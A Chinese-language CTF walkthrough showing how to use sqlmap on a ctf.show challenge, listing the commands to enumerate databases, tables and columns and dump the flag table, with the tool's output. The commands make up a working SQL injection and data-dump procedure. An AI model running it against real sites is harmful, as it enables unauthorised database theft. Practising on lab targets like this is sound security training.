sqlmap使用

常用参数

text

常用参数
--dbs 所有数据库
--tables 所有表
--columns 所有列

第一步：开始脚本注入

使用sqlmap -u url来进行注入

例：

sqlmap -u "http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id="

第二步：查表

执行上述命令后得到注入成功的回显然后可以进行查库操作

如上述命令执行后得到

text


available databases [7]:                                                                                                                                                                                    
[*] ctfshow
[*] ctftraining
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

接下来可以查看指定库的所有表：sqlmap -u "http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id=" -D ctfshow --tables
得到回显

text

Database: ctfshow
[1 table]
+------+
| flag |
+------+

到这里就说明查询到表flag了，接下来使用: sqlmap -u "http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id=" -D ctfshow -T flag --columns

text


Database: ctfshow                                                                                                                                                                                           
Table: flag
[2 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| flag   | varchar(255) |
| id     | int(11)      |
+--------+--------------+

接下来使用直接dump出来: sqlmap -u "http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id=" -D ctfshow -T flag --dump

text

Database: ctfshow
Table: flag
[1 entry]
+----+-----------------------------------------------+
| id | flag                                          |
+----+-----------------------------------------------+
| 1  | ctfshow{cd6650cb-4523-49ee-8251-bcbf145e920c} |
+----+-----------------------------------------------+